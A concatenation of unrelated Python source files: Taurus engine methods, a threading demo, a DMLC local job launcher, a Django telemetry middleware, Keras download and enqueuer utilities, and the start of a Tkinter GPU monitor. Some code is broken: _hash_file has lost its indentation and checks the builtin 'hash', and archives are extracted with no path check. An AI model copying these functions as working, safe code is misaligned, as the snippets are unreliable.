        return
    self.aggregator = self.instantiate_module(alias)
    self.prepared.append(self.aggregator)
    self.aggregator.prepare()
def get_http_client(self):
    """
    Lazily create the shared HTTP client, applying proxy settings once.

    :rtype: HTTPClient
    """
    if self._http_client is None:
        self._http_client = HTTPClient()
        # use the SETTINGS constant like the rest of this class, instead of
        # the bare "settings" string literal (same key, consistent style)
        self._http_client.add_proxy_settings(self.config.get(SETTINGS).get("proxy"))
    return self._http_client
def _check_updates(self, install_id):
    """Best-effort check whether a newer Taurus version exists; never raises."""
    try:
        params = (bzt.VERSION, install_id)
        addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
        self.log.debug("Requesting updates info: %s", addr)
        client = self.get_http_client()
        response = client.request('GET', addr, timeout=10)

        data = response.json()
        self.log.debug("Taurus updates info: %s", data)
        mine = LooseVersion(bzt.VERSION)
        latest = LooseVersion(data['latest'])
        # server can force the nag via 'needsUpgrade' even for equal versions
        if mine < latest or data['needsUpgrade']:
            msg = "There is newer version of Taurus %s available, consider upgrading. " \
                  "What's new: http://gettaurus.org/docs/Changelog/"
            self.log.warning(msg, latest)
        else:
            self.log.debug("Installation is up-to-date")
    except BaseException:
        # an update check failure must never break a test run
        self.log.debug("Failed to check for updates: %s", traceback.format_exc())
        self.log.warning("Failed to check for updates")
def eval_env(self):
    """
    Should be done after `configure`
    """
    envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
    envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir

    # pass 1: stringify values and expand $VAR references from the OS env
    for varname in envs:
        if envs[varname]:
            envs[varname] = str(envs[varname])
            envs[varname] = os.path.expandvars(envs[varname])

    # pass 2: apply to the process environment; a None value means "unset"
    for varname in envs:
        if envs[varname] is None:
            if varname in os.environ:
                os.environ.pop(varname)
        else:
            os.environ[varname] = str(envs[varname])

    def custom_expandvars(value):
        # expand ${name} placeholders using the settings-level env mapping
        parts = re.split(r'(\$\{.*?\})', value)
        value = ''
        for item in parts:
            if item and item.startswith("${") and item.endswith("}"):
                key = item[2:-1]
                if key in envs:
                    item = envs[key]
            if item is not None:
                value += text_type(item)
        return value

    def apply_env(value, key, container):
        # callback for BetterDict.traverse: expand strings in place
        if isinstance(value, string_types):
            container[key] = custom_expandvars(value)

    # pass 3: substitute ${...} placeholders throughout the whole config tree
    BetterDict.traverse(self.config, apply_env)
|
star_wars_2_threads.py | import threading
from time import sleep
from random import random
def run(n):
    """Print n greetings from the current thread, pausing a random moment between them."""
    me = threading.current_thread()
    for count in range(n):
        print(f'Hello from {me.name}! ({count})')
        sleep(0.9 * random())
# spawn both greeters, then wait for each one to finish
yoda = threading.Thread(target=run, name='Yoda', args=(4, ))
vader = threading.Thread(target=run, name='Vader', args=(3, ))
for worker in (yoda, vader):
    worker.start()
for worker in (yoda, vader):
    worker.join()
|
local.py | """Submission job for local jobs."""
# pylint: disable=invalid-name
import sys
import os
import subprocess
import logging
from threading import Thread
from . import tracker
keepalive = """
nrep=0
rc=254
while [ $rc -ne 0 ];
do
export DMLC_NUM_ATTEMPT=$nrep
%s
rc=$?;
nrep=$((nrep+1));
done
"""
def exec_cmd(cmd, role, taskid, pass_env):
    """Execute the command line command.

    Runs `cmd` as a shell command with DMLC_* variables describing the task,
    retrying until the command exits with code 0 (via a Python loop on
    Windows, via the `keepalive` bash wrapper elsewhere).

    Parameters
    ----------
    cmd : list of str
        Command and its arguments.
    role : str
        DMLC role for this task, exported as DMLC_ROLE.
    taskid : int
        Numeric task id, exported as DMLC_TASK_ID.
    pass_env : dict
        Extra environment variables for the child process.
    """
    # local executables need an explicit ./ prefix for POSIX shells
    if cmd[0].find('/') == -1 and os.path.exists(cmd[0]) and os.name != 'nt':
        cmd[0] = './' + cmd[0]
    cmd = ' '.join(cmd)
    env = os.environ.copy()
    for k, v in list(pass_env.items()):
        env[k] = str(v)
    env['DMLC_TASK_ID'] = str(taskid)
    env['DMLC_ROLE'] = role
    env['DMLC_JOB_CLUSTER'] = 'local'

    ntrial = 0
    while True:
        if os.name == 'nt':
            # Windows has no bash: do the retry loop in Python
            env['DMLC_NUM_ATTEMPT'] = str(ntrial)
            ret = subprocess.call(cmd, shell=True, env=env)
            if ret != 0:
                ntrial += 1
                continue
        else:
            # POSIX: wrap the command into the `keepalive` bash retry loop
            bash = keepalive % (cmd)
            ret = subprocess.call(bash, shell=True, executable='bash', env=env)
        if ret == 0:
            logging.debug('Thread %d exit with 0', taskid)
            return
        else:
            if os.name == 'nt':
                sys.exit(-1)
            else:
                raise RuntimeError('Get nonzero return code=%d' % ret)
def submit(args):
    """Submit function of local jobs.

    Starts all worker/server tasks as daemon threads on the local machine
    through the generic tracker.
    """
    def mthread_submit(nworker, nserver, envs):
        """
        Customized submit script: starts nworker + nserver local threads,
        each executing `args.command` with the given environment.

        Parameters
        ----------
        nworker: number of slave process to start up
        nserver: number of server nodes to start up
        envs: enviroment variables to be added to the starting programs
        """
        procs = {}
        for i in range(nworker + nserver):
            role = 'worker' if i < nworker else 'server'
            procs[i] = Thread(target=exec_cmd, args=(args.command, role, i, envs))
            # Thread.setDaemon() is deprecated since Python 3.10;
            # assign the `daemon` attribute instead
            procs[i].daemon = True
            procs[i].start()

    # call submit, with nslave, the commands to run each job and submit function
    tracker.submit(args.num_workers, args.num_servers, fun_submit=mthread_submit,
                   pscmd=(' '.join(args.command)))
|
middleware.py | import time
import sys
import traceback
import requests
import json
import threading
import logging
import django
from django.http import HttpResponse
from django.utils.deprecation import MiddlewareMixin
from django.conf import settings
logger = logging.getLogger(__name__)
# only logging error response; the original code accidentally ASSIGNED to
# logger.setLevel instead of calling it, so the level was never applied
logger.setLevel(logging.DEBUG)
file_handler = logging.FileHandler('apio.log')
logger.addHandler(file_handler)
formatter = logging.Formatter(
    '%(levelname)s:%(name)s:%(asctime)s:%(lineno)d:%(message)s')
file_handler.setFormatter(formatter)
class ApioMiddleware(MiddlewareMixin):
    """Collates performance variables
    and exception data to be shared with owner"""

    def process_exception(self, request, exception):
        """Ship exception details to the apio.in collector on a background thread.

        Always returns None so Django's default exception handling proceeds.
        """
        try:
            apio_url_exception = "https://apio.in/remote_data_exception"
            # collating exception data
            exception_data = {
                "path": request.environ["wsgi.url_scheme"] + "://"
                        + request.environ["HTTP_HOST"] + request.get_full_path(),
                "exception": exception.__class__.__name__
                             + ": " + str(sys.exc_info()[1]),
                "traceback": traceback.format_exc(),
                "user": str(request.user),
                "ip_address": get_client_ip(request),
                "method": request.method
            }
            # don't report failures of the collector endpoint itself
            if exception_data["path"] != apio_url_exception:
                # sending request on new thread
                t = threading.Thread(
                    target=send_exception_data_request,
                    args=[exception_data])
                t.start()
                # stray debug print()s removed; also threading.activeCount()
                # is deprecated in favor of active_count()
                logger.debug("exception middleware, thread count: %d",
                             threading.active_count())
        except Exception as e:
            # middleware must never break the request cycle
            logger.debug(str(e))
        return None

    def process_request(self, request):
        """Stamp the request with a start time for latency measurement."""
        request.start_timestamp = time.time()

    def process_response(self, request, response):
        """Calculate response time"""
        try:
            apio_perf_data_url = "https://apio.in/remote_perf_data"
            response_timestamp = time.time()
            # collating perf data
            perf_data = {
                "request_timestamp": request.start_timestamp,
                "response_timestamp": response_timestamp,
                "response_code": response.status_code,
                "path": request.environ["wsgi.url_scheme"] + "://"
                        + request.environ["HTTP_HOST"] + request.get_full_path(),
                "requester": str(request.user),
                "ip_address": get_client_ip(request),
                "method": request.method
            }
            # don't measure the reporting endpoint itself
            if perf_data["path"] != apio_perf_data_url:
                # Sending request on another thread
                t = threading.Thread(
                    target=send_perf_data_request, args=[perf_data])
                t.start()
                # stray debug print()s removed in favor of the module logger
                logger.debug("perf middleware, thread count: %d",
                             threading.active_count())
        except Exception as e:
            # middleware must never break the request cycle
            logger.debug(str(e))
        return response
def send_exception_data_request(exception_data):
    """Deliver collected exception data to the apio.in collector; failures are only logged."""
    endpoint = "https://apio.in/remote_data_exception"
    try:
        api_headers = {"x-api-key": settings.APIO_D["application_key"]}
        requests.post(endpoint,
                      data=json.dumps(exception_data),
                      headers=api_headers)
    except Exception as e:
        logger.debug(str(e))
def send_perf_data_request(perf_data):
    """Deliver collected performance data to the apio.in collector; failures are only logged."""
    endpoint = "https://apio.in/remote_perf_data"
    try:
        api_headers = {"x-api-key": settings.APIO_D["application_key"]}
        requests.post(endpoint,
                      data=json.dumps(perf_data),
                      headers=api_headers)
    except Exception as e:
        logger.debug(str(e))
def get_client_ip(request):
    """Best-effort client IP: last X-Forwarded-For hop if present, else REMOTE_ADDR."""
    forwarded = request.META.get('HTTP_X_FORWARDED_FOR')
    if forwarded:
        return forwarded.split(',')[-1].strip()
    return request.META.get('REMOTE_ADDR')
|
data_utils.py | """Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
# Python 2 lacks a proxy-friendly urlretrieve; provide a replacement there,
# and re-export the standard one everywhere else.
if sys.version_info[0] == 2:
    def urlretrieve(url, filename, reporthook=None, data=None):
        """Replacement for `urlretrieve` for Python 2.

        Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
        `urllib` module, known to have issues with proxy management.

        # Arguments
            url: url to retrieve.
            filename: where to store the retrieved data locally.
            reporthook: a hook function that will be called once
                on establishment of the network connection and once
                after each block read thereafter.
                The hook will be passed three arguments;
                a count of blocks transferred so far,
                a block size in bytes, and the total size of the file.
            data: `data` argument passed to `urlopen`.
        """
        def chunk_read(response, chunk_size=8192, reporthook=None):
            # total size comes from the Content-Length header; -1 if unknown
            content_type = response.info().get('Content-Length')
            total_size = -1
            if content_type is not None:
                total_size = int(content_type.strip())
            count = 0
            while True:
                chunk = response.read(chunk_size)
                count += 1
                if reporthook is not None:
                    reporthook(count, chunk_size, total_size)
                if chunk:
                    yield chunk
                else:
                    break

        with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
            for chunk in chunk_read(response, reporthook=reporthook):
                fd.write(chunk)
else:
    from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
    """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.

    # Arguments
        file_path: path to the archive file
        path: path to extract the archive file
        archive_format: Archive format to try for extracting the file.
            Options are 'auto', 'tar', 'zip', and None.
            'tar' includes tar, tar.gz, and tar.bz files.
            The default 'auto' is ['tar', 'zip'].
            None or an empty list will return no matches found.

    # Returns
        True if a match was found and an archive extraction was completed,
        False otherwise.
    """
    if archive_format is None:
        return False
    # NOTE: string comparisons below used `is`, which depends on CPython
    # string interning and raises SyntaxWarning on modern Python; use `==`
    if archive_format == 'auto':
        archive_format = ['tar', 'zip']
    if isinstance(archive_format, six.string_types):
        archive_format = [archive_format]

    for archive_type in archive_format:
        if archive_type == 'tar':
            open_fn = tarfile.open
            is_match_fn = tarfile.is_tarfile
        if archive_type == 'zip':
            open_fn = zipfile.ZipFile
            is_match_fn = zipfile.is_zipfile

        if is_match_fn(file_path):
            with open_fn(file_path) as archive:
                try:
                    archive.extractall(path)
                except (tarfile.TarError, RuntimeError,
                        KeyboardInterrupt):
                    # remove partially-extracted output before re-raising
                    if os.path.exists(path):
                        if os.path.isfile(path):
                            os.remove(path)
                        else:
                            shutil.rmtree(path)
                    raise
            return True
    return False
def get_file(fname,
             origin,
             untar=False,
             md5_hash=None,
             file_hash=None,
             cache_subdir='datasets',
             hash_algorithm='auto',
             extract=False,
             archive_format='auto',
             cache_dir=None):
    """Downloads a file from a URL if it not already in the cache.

    By default the file at the url `origin` is downloaded to the
    cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
    and given the filename `fname`. The final location of a file
    `example.txt` would therefore be `~/.keras/datasets/example.txt`.

    Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
    Passing a hash will verify the file after download. The command line
    programs `shasum` and `sha256sum` can compute the hash.

    # Arguments
        fname: Name of the file. If an absolute path `/path/to/file.txt` is
            specified the file will be saved at that location.
        origin: Original URL of the file.
        untar: Deprecated in favor of 'extract'.
            boolean, whether the file should be decompressed
        md5_hash: Deprecated in favor of 'file_hash'.
            md5 hash of the file for verification
        file_hash: The expected hash string of the file after download.
            The sha256 and md5 hash algorithms are both supported.
        cache_subdir: Subdirectory under the Keras cache dir where the file is
            saved. If an absolute path `/path/to/folder` is
            specified the file will be saved at that location.
        hash_algorithm: Select the hash algorithm to verify the file.
            options are 'md5', 'sha256', and 'auto'.
            The default 'auto' detects the hash algorithm in use.
        extract: True tries extracting the file as an Archive, like tar or zip.
        archive_format: Archive format to try for extracting the file.
            Options are 'auto', 'tar', 'zip', and None.
            'tar' includes tar, tar.gz, and tar.bz files.
            The default 'auto' is ['tar', 'zip'].
            None or an empty list will return no matches found.
        cache_dir: Location to store cached files, when None it
            defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).

    # Returns
        Path to the downloaded file
    """  # noqa
    if cache_dir is None:
        cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
    if md5_hash is not None and file_hash is None:
        # legacy arguments: treat md5_hash as file_hash with the md5 algorithm
        file_hash = md5_hash
        hash_algorithm = 'md5'
    datadir_base = os.path.expanduser(cache_dir)
    if not os.access(datadir_base, os.W_OK):
        # fall back to a writable location when the cache dir is read-only
        datadir_base = os.path.join('/tmp', '.keras')
    datadir = os.path.join(datadir_base, cache_subdir)
    if not os.path.exists(datadir):
        os.makedirs(datadir)

    if untar:
        untar_fpath = os.path.join(datadir, fname)
        fpath = untar_fpath + '.tar.gz'
    else:
        fpath = os.path.join(datadir, fname)

    download = False
    if os.path.exists(fpath):
        # File found; verify integrity if a hash was provided.
        if file_hash is not None:
            if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
                print('A local file was found, but it seems to be '
                      'incomplete or outdated because the ' + hash_algorithm +
                      ' file hash does not match the original value of ' +
                      file_hash + ' so we will re-download the data.')
                download = True
    else:
        download = True

    if download:
        print('Downloading data from', origin)

        class ProgressTracker(object):
            # Maintain progbar for the lifetime of download.
            # This design was chosen for Python 2.7 compatibility.
            progbar = None

        def dl_progress(count, block_size, total_size):
            # first call creates the progress bar; subsequent calls update it
            if ProgressTracker.progbar is None:
                if total_size is -1:
                    total_size = None
                ProgressTracker.progbar = Progbar(total_size)
            else:
                ProgressTracker.progbar.update(count * block_size)

        error_msg = 'URL fetch failure on {}: {} -- {}'
        try:
            try:
                urlretrieve(origin, fpath, dl_progress)
            except HTTPError as e:
                raise Exception(error_msg.format(origin, e.code, e.msg))
            except URLError as e:
                raise Exception(error_msg.format(origin, e.errno, e.reason))
        except (Exception, KeyboardInterrupt):
            # remove partial downloads before propagating the error
            if os.path.exists(fpath):
                os.remove(fpath)
            raise
        ProgressTracker.progbar = None

    if untar:
        if not os.path.exists(untar_fpath):
            _extract_archive(fpath, datadir, archive_format='tar')
        return untar_fpath

    if extract:
        _extract_archive(fpath, datadir, archive_format)

    return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
    """Validates a file against a sha256 or md5 hash.

    # Arguments
        fpath: path to the file being validated
        file_hash: The expected hash string of the file.
            The sha256 and md5 hash algorithms are both supported.
        algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
            The default 'auto' detects the hash algorithm in use.
        chunk_size: Bytes to read at a time, important for large files.

    # Returns
        Whether the file is valid
    """
    # `is` comparisons on strings/ints replaced with `==`: identity of
    # interned literals is a CPython implementation detail and raises
    # SyntaxWarning on modern Python. A 64-char hash implies sha256.
    if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
        hasher = 'sha256'
    else:
        hasher = 'md5'

    # return the comparison directly instead of an if/else True/False
    return str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash)
class Sequence(object):
    """Base object for fitting to a sequence of data, such as a dataset.

    Subclasses must implement `__getitem__` (return one complete batch) and
    `__len__` (number of batches). Implement `on_epoch_end` to mutate the
    dataset between epochs.

    # Notes

    `Sequence` are a safer way to do multiprocessing. This structure guarantees
    that the network will only train once on each sample per epoch which is not
    the case with generators.

    # Examples

    ```python
        from skimage.io import imread
        from skimage.transform import resize
        import numpy as np

        # Here, `x_set` is list of path to the images
        # and `y_set` are the associated classes.

        class CIFAR10Sequence(Sequence):

            def __init__(self, x_set, y_set, batch_size):
                self.x, self.y = x_set, y_set
                self.batch_size = batch_size

            def __len__(self):
                return int(np.ceil(len(self.x) / float(self.batch_size)))

            def __getitem__(self, idx):
                batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
                batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]

                return np.array([
                    resize(imread(file_name), (200, 200))
                       for file_name in batch_x]), np.array(batch_y)
    ```
    """

    @abstractmethod
    def __getitem__(self, index):
        """Gets batch at position `index`.

        # Arguments
            index: position of the batch in the Sequence.

        # Returns
            A batch
        """
        raise NotImplementedError

    @abstractmethod
    def __len__(self):
        """Number of batch in the Sequence.

        # Returns
            The number of batches in the Sequence.
        """
        raise NotImplementedError

    def on_epoch_end(self):
        """Hook invoked at the end of every epoch; no-op by default."""
        pass

    def __iter__(self):
        """Yield every batch in order, from 0 to len(self) - 1."""
        for index in range(len(self)):
            yield self[index]
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
    """Worker-pool initializer: install `seqs` as the shared uid->Sequence map."""
    global _SHARED_SEQUENCES
    _SHARED_SEQUENCES = seqs
def get_index(uid, i):
    """Fetch element `i` of the Sequence registered under `uid`.

    Several Sequences may be in flight simultaneously (e.g. training and
    validation); each is looked up by its own `uid` so that one cannot
    overwrite another.

    # Arguments
        uid: int, Sequence identifier
        i: index

    # Returns
        The value at index `i`.
    """
    sequence = _SHARED_SEQUENCES[uid]
    return sequence[i]
class SequenceEnqueuer(object):
    """Base class to enqueue inputs.

    The task of an Enqueuer is to use parallelism to speed up preprocessing.
    This is done with processes or threads.

    # Examples

    ```python
    enqueuer = SequenceEnqueuer(...)
    enqueuer.start()
    datas = enqueuer.get()
    for data in datas:
        # Use the inputs; training, evaluating, predicting.
        # ... stop sometime.
    enqueuer.close()
    ```

    The `enqueuer.get()` should be an infinite stream of datas.
    """

    def __init__(self, sequence,
                 use_multiprocessing=False):
        self.sequence = sequence
        self.use_multiprocessing = use_multiprocessing
        global _SEQUENCE_COUNTER
        # Lazily create the process-wide counter used to hand out unique uids.
        if _SEQUENCE_COUNTER is None:
            try:
                _SEQUENCE_COUNTER = mp.Value('i', 0)
            except OSError:
                # In this case the OS does not allow us to use
                # multiprocessing. We resort to an int
                # for enqueuer indexing.
                _SEQUENCE_COUNTER = 0
        if isinstance(_SEQUENCE_COUNTER, int):
            # Single-process fallback: a plain int increment is fine here.
            self.uid = _SEQUENCE_COUNTER
            _SEQUENCE_COUNTER += 1
        else:
            # Doing Multiprocessing.Value += x is not process-safe.
            with _SEQUENCE_COUNTER.get_lock():
                self.uid = _SEQUENCE_COUNTER.value
                _SEQUENCE_COUNTER.value += 1
        self.workers = 0
        self.executor_fn = None  # set in start(); callable that builds the pool
        self.queue = None  # queue of AsyncResult futures produced by _run()
        self.run_thread = None  # daemon thread running _run()
        self.stop_signal = None  # threading.Event set by stop()

    def is_running(self):
        # True only between start() (which creates stop_signal) and stop().
        return self.stop_signal is not None and not self.stop_signal.is_set()

    def start(self, workers=1, max_queue_size=10):
        """Start the handler's workers.

        # Arguments
            workers: number of worker threads
            max_queue_size: queue size
                (when full, workers could block on `put()`)
        """
        if self.use_multiprocessing:
            self.executor_fn = self._get_executor_init(workers)
        else:
            # We do not need the init since it's threads.
            self.executor_fn = lambda _: ThreadPool(workers)
        self.workers = workers
        self.queue = queue.Queue(max_queue_size)
        self.stop_signal = threading.Event()
        self.run_thread = threading.Thread(target=self._run)
        self.run_thread.daemon = True
        self.run_thread.start()

    def _send_sequence(self):
        """Send current Iterable to all workers."""
        # For new processes that may spawn
        _SHARED_SEQUENCES[self.uid] = self.sequence

    def stop(self, timeout=None):
        """Stops running threads and wait for them to exit, if necessary.

        Should be called by the same thread which called `start()`.

        # Arguments
            timeout: maximum time to wait on `thread.join()`
        """
        self.stop_signal.set()
        # Drain the queue under its own mutex so a producer blocked in put()
        # wakes up and can observe stop_signal.
        with self.queue.mutex:
            self.queue.queue.clear()
            self.queue.unfinished_tasks = 0
            self.queue.not_full.notify()
        self.run_thread.join(timeout)
        # Drop the reference so workers can no longer fetch this sequence.
        _SHARED_SEQUENCES[self.uid] = None

    @abstractmethod
    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        raise NotImplementedError

    @abstractmethod
    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        raise NotImplementedError

    @abstractmethod
    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Returns
            Generator yielding tuples `(inputs, targets)`
            or `(inputs, targets, sample_weights)`.
        """
        raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
    """Builds a Enqueuer from a Sequence.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        sequence: A `keras.utils.data_utils.Sequence` object.
        use_multiprocessing: use multiprocessing if True, otherwise threading
        shuffle: whether to shuffle the data at the beginning of each epoch
    """

    def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
        super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
        self.shuffle = shuffle

    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        return lambda seqs: mp.Pool(workers,
                                    initializer=init_pool,
                                    initargs=(seqs,))

    def _wait_queue(self):
        """Wait for the queue to be empty."""
        # Polls every 100ms; also returns early if stop() was requested.
        while True:
            time.sleep(0.1)
            if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
                return

    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        sequence = list(range(len(self.sequence)))
        self._send_sequence()  # Share the initial sequence
        # One iteration of this loop == one epoch; a fresh pool per epoch so
        # workers pick up the sequence updated by on_epoch_end().
        while True:
            if self.shuffle:
                random.shuffle(sequence)
            with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
                for i in sequence:
                    if self.stop_signal.is_set():
                        return
                    # put() blocks when the queue is full, throttling submission.
                    self.queue.put(
                        executor.apply_async(get_index, (self.uid, i)), block=True)
                # Done with the current epoch, waiting for the final batches
                self._wait_queue()
                if self.stop_signal.is_set():
                    # We're done
                    return
            # Call the internal on epoch end.
            self.sequence.on_epoch_end()
            self._send_sequence()  # Update the pool

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Yields
            The next element in the queue, i.e. a tuple
            `(inputs, targets)` or
            `(inputs, targets, sample_weights)`.
        """
        try:
            while self.is_running():
                # Outer get() pops the future; inner get() waits for its result.
                inputs = self.queue.get(block=True).get()
                self.queue.task_done()
                if inputs is not None:
                    yield inputs
        except Exception as e:
            # Stop the producer thread, then re-raise with the original traceback.
            self.stop()
            six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
    """Worker-pool initializer for generator workers.

    Installs `gens` as the shared uid->generator map and, when requested,
    gives each worker process a distinct NumPy seed.
    """
    global _SHARED_SEQUENCES
    _SHARED_SEQUENCES = gens
    if random_seed is not None:
        # Offset the seed by the process id so workers don't produce
        # identical random streams.
        ident = mp.current_process().ident
        # NOTE(review): np.random.seed requires 0 <= seed < 2**32;
        # random_seed + ident could exceed that for large seeds — confirm.
        np.random.seed(random_seed + ident)
def next_sample(uid):
    """Advance the generator registered under `uid` and return its next value.

    Multiple generators can be active at the same time (e.g. training and
    validation), so the one to advance is selected by its own `uid` rather
    than through a single shared slot.

    # Arguments
        uid: int, generator identifier

    # Returns
        The next value of generator `uid`.
    """
    generator = _SHARED_SEQUENCES[uid]
    return six.next(generator)
class GeneratorEnqueuer(SequenceEnqueuer):
    """Builds a queue out of a data generator.

    The provided generator can be finite in which case the class will throw
    a `StopIteration` exception.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        sequence: a generator function which yields data
        use_multiprocessing: use multiprocessing if True, otherwise threading
        wait_time: deprecated, ignored (kept for backward compatibility)
        random_seed: Initial seed for workers,
            will be incremented by one for each worker.
    """

    def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
                 random_seed=None):
        super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
        self.random_seed = random_seed
        if wait_time is not None:
            warnings.warn('`wait_time` is not used anymore.',
                          DeprecationWarning)

    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        return lambda seqs: mp.Pool(workers,
                                    initializer=init_pool_generator,
                                    initargs=(seqs, self.random_seed))

    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        self._send_sequence()  # Share the initial generator
        with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
            while True:
                if self.stop_signal.is_set():
                    return
                # put() blocks when the queue is full, throttling submission.
                self.queue.put(
                    executor.apply_async(next_sample, (self.uid,)), block=True)

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Yields
            The next element in the queue, i.e. a tuple
            `(inputs, targets)` or
            `(inputs, targets, sample_weights)`.
        """
        try:
            while self.is_running():
                # Outer get() pops the future; inner get() waits for its result
                # and re-raises any exception from the worker (e.g. StopIteration).
                inputs = self.queue.get(block=True).get()
                self.queue.task_done()
                if inputs is not None:
                    yield inputs
        except StopIteration:
            # Special case for finite generators
            last_ones = []
            while self.queue.qsize() > 0:
                last_ones.append(self.queue.get(block=True))
            # Wait for them to complete
            list(map(lambda f: f.wait(), last_ones))
            # Keep the good ones
            last_ones = [future.get() for future in last_ones if future.successful()]
            for inputs in last_ones:
                if inputs is not None:
                    yield inputs
        except Exception as e:
            self.stop()
            # NOTE(review): the concatenated message below lacks separating
            # spaces between segments; left as-is since it is a runtime string.
            if 'generator already executing' in str(e):
                raise RuntimeError(
                    "Your generator is NOT thread-safe."
                    "Keras requires a thread-safe generator when"
                    "`use_multiprocessing=False, workers > 1`."
                    "For more information see issue #1638.")
            six.reraise(*sys.exc_info())
|
nvidiaGpuMonPy.py | from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
import tkinter as tk
import psutil
import pynvml
import socket
import threading
import os
# __MAIN__
def main():
    """Create the GPU monitor application, run its Tk main loop, and shut
    NVML down on exit."""
    # Dictionary for the border effects around the frames and labels
    # NOTE(review): border_effects is never referenced below — candidate for removal.
    border_effects = {
        "flat": tk.FLAT,
        "sunken": tk.SUNKEN,
        "raised": tk.RAISED,
        "groove": tk.GROOVE,
        "ridge": tk.RIDGE,
    }
    # Initialize NVML and get the GPU handle which is used by NVML to get the GPU info
    pynvml.nvmlInit()
    _handle = pynvml.nvmlDeviceGetHandleByIndex(0)
    # Class to create and configure the main widget, frames, labels, and the functions used in gathering the GPU data
    class App(tk.Tk):

        def __init__(self, *args, **kwargs):
            """Build the main window, menus, frames, and labels, then start
            the once-per-second label refresh cycle."""
            tk.Tk.__init__(self, *args, **kwargs)
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.server_thread = threading.Thread(target=self.start_server)  # start the server on a separate thread
            self.allowSending = False  # sending off by default
            self.disconnect = False  # used to stop the server
            self.has_name = False  # NOTE(review): never read anywhere — candidate for removal
            # Configure the main window
            self.title('NVIDIA GPU MON PY')
            # Set window height and width and position in center of screen
            w = 320
            h = 180
            sw = self.winfo_screenwidth()
            sh = self.winfo_screenheight()
            x = (sw / 2) - (w / 2)
            y = (sh / 2) - (h / 2)
            self.geometry("%dx%d+%d+%d" % (w, h, x, y))
            self.resizable(False, False)
            self.configure(bg='black')
            self.columnconfigure(0, weight=1)
            self.rowconfigure(0, weight=0)
            # Settings window
            # File menu
            self.menubar = Menu(master=self)
            path = os.path.join(os.getcwd(), 'images', 'icon', 's_ico.png')
            self.load = Image.open(path)
            self.settings_icon = ImageTk.PhotoImage(self.load)
            self.server_menu = Menu(self.menubar, tearoff=0)
            # NOTE(review): a Thread object can only be started once — selecting
            # "Start Server" a second time raises RuntimeError.
            self.server_menu.add_command(label="Start Server", command=self.server_thread.start)
            self.server_menu.add_command(label="Settings", image=self.settings_icon, compound="left",
                                         command=self.settings_menu)
            self.menubar.add_cascade(label="File", menu=self.server_menu)
            self.server_menu.add_separator()
            self.server_menu.add_command(label="Exit", command=self.exit)
            # Frame containing the Label for the GPU Name
            # -------------------------------------------
            self.name_frame = tk.Frame(master=self, bg='black', relief='sunken', borderwidth=3)
